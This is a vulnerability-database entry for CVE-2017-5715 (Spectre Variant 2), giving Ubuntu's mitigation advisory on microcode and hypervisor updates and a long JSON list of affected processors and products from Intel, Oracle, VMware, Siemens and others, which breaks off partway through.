Please note that fully mitigating CVE-2017-5715 (Spectre Variant 2) requires corresponding processor microcode/firmware updates or, in virtual environments, hypervisor updates. On i386 and amd64 architectures, the IBRS and IBPB features are required to enable the kernel mitigations. Ubuntu is working with Intel and AMD to provide future microcode updates that implement IBRS and IBPB as they are made available. Ubuntu users with a processor from a different vendor should contact the vendor to identify necessary firmware updates. Ubuntu will provide corresponding QEMU updates in the future for users of self-hosted virtual environments in coordination with upstream QEMU. Ubuntu users in cloud environments should contact the cloud provider to confirm that the hypervisor has been updated to expose the new CPU features to virtual machines

Show details on source website

JSON

To clipboard

{
  "affected_products": {
    "_id": null,
    "data": [
      {
        "_id": null,
        "model": "solaris",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "oracle",
        "version": "11.3"
      },
      {
        "_id": null,
        "model": "esxi",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "_id": null,
        "model": "solaris",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "_id": null,
        "model": "esxi",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "vmware",
        "version": "6.5"
      },
      {
        "_id": null,
        "model": "xeon e5 2450l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5550"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340"
      },
      {
        "_id": null,
        "model": "vl2 ppc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "dl ppc15 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "_id": null,
        "model": "virtual machine manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "6.2-23739"
      },
      {
        "_id": null,
        "model": "xeon e5 2430",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "simatic itc2200 pro",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v3"
      },
      {
        "_id": null,
        "model": "vl2 ppc12 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770k"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2677m"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5509"
      },
      {
        "_id": null,
        "model": "core m5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y57"
      },
      {
        "_id": null,
        "model": "xeon e3 1275 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110"
      },
      {
        "_id": null,
        "model": "xeon e3 1246 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "router manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "1.1.7-6941-1"
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4108"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670qm"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2750"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210u"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1585l_v5"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2300"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2760"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3830"
      },
      {
        "_id": null,
        "model": "core m3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7y32"
      },
      {
        "_id": null,
        "model": "local service management system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.3"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2850_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "965"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650u"
      },
      {
        "_id": null,
        "model": "vl2 ppc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3958"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8894_v4"
      },
      {
        "_id": null,
        "model": "simatic itc1900 pro",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "940"
      },
      {
        "_id": null,
        "model": "xeon e5 2470",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2657m"
      },
      {
        "_id": null,
        "model": "btc12",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "pepperl fuchs",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4360"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4308u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500te"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5200u"
      },
      {
        "_id": null,
        "model": "xeon e3 1230 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176f"
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3455"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4460s"
      },
      {
        "_id": null,
        "model": "xeon e3 1240",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 2640 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "diskstation manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "synology",
        "version": "5.2"
      },
      {
        "_id": null,
        "model": "xeon e3 1505l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7230"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8170"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5010u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6400"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3010"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4010y"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2680_v2"
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3445"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10c"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3740d"
      },
      {
        "_id": null,
        "model": "xeon e3 1270 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4617"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200y"
      },
      {
        "_id": null,
        "model": "xeon e5 2448l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3 1260l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4558u"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520e"
      },
      {
        "_id": null,
        "model": "xeon e3 1240 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6267u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660ue"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3338"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5750hq"
      },
      {
        "_id": null,
        "model": "leap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "opensuse",
        "version": "42.2"
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3150"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "430m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "655k"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5775r"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3217ue"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210m"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3520m"
      },
      {
        "_id": null,
        "model": "xeon e3 1285 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770k"
      },
      {
        "_id": null,
        "model": "xeon e3 1240l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3200rk"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3537u"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700ec"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5120"
      },
      {
        "_id": null,
        "model": "bl2 ppc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1575m_v5"
      },
      {
        "_id": null,
        "model": "xeon e5 2648l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4116"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6102e"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2520m"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3320m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v3"
      },
      {
        "_id": null,
        "model": "vs960hd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2830"
      },
      {
        "_id": null,
        "model": "cortex-a12",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "neoverse n2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3229y"
      },
      {
        "_id": null,
        "model": "xeon e5 1660 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2560"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8857_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 2630 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6136"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v2"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8168"
      },
      {
        "_id": null,
        "model": "xeon e3 1265l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2377m"
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3845"
      },
      {
        "_id": null,
        "model": "cortex-a78",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "650"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330m"
      },
      {
        "_id": null,
        "model": "xeon e5 1650 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3060"
      },
      {
        "_id": null,
        "model": "xeon e3 1280",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "820qm"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160f"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620um"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4620_v2"
      },
      {
        "_id": null,
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3826"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5700hq"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5504"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735f"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4302y"
      },
      {
        "_id": null,
        "model": "xeon e5 2448l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v2"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5850eq"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5650"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2637m"
      },
      {
        "_id": null,
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1535m_v5"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4750hq"
      },
      {
        "_id": null,
        "model": "local service management system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.1"
      },
      {
        "_id": null,
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4200"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5506"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5119t"
      },
      {
        "_id": null,
        "model": "vs360hd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "synology",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470"
      },
      {
        "_id": null,
        "model": "xeon e5 2623 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850"
      },
      {
        "_id": null,
        "model": "vl ipc p7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5 1680 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5118"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138t"
      },
      {
        "_id": null,
        "model": "vl ppc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v4"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770s"
      },
      {
        "_id": null,
        "model": "simatic winac rtx \\ 2010",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "2010"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100te"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3339y"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4960hq"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590s"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "880"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310e"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "960"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6320"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690s"
      },
      {
        "_id": null,
        "model": "xeon e5 1620 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4430s"
      },
      {
        "_id": null,
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3110m"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8850_v2"
      },
      {
        "_id": null,
        "model": "xeon e5 2643 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2518"
      },
      {
        "_id": null,
        "model": "vl2 ppc7 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5630"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700mq"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3430"
      },
      {
        "_id": null,
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160m"
      },
      {
        "_id": null,
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y70"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4603_v2"
      },
      {
        "_id": null,
        "model": "bl bpc 7001",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770t"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2320"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "750s"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4950hq"
      },
      {
        "_id": null,
        "model": "xeon e5 2430 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860_v4"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2515e"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4430"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "875k"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138f"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867_v4"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "920xm"
      },
      {
        "_id": null,
        "model": "workstation",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "vmware",
        "version": "12.5.8"
      },
      {
        "_id": null,
        "model": "bl bpc 3001",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "470um"
      },
      {
        "_id": null,
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w3680"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620m"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2697_v4"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3740"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610m"
      },
      {
        "_id": null,
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2308"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3630qm"
      },
      {
        "_id": null,
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570te"
      },
      {
        "_id": null,
        "model": "xeon e3 1286 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667"
      },
      {
        "_id": null,
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700eq"
      },
      {
        "_id": null,
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2683_v4"
      },
      {
        "_id": null,
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126"
      },
      {
        "_id": null,
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2460"
      },
      {
        "_id": null,
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v4"
      },
      {
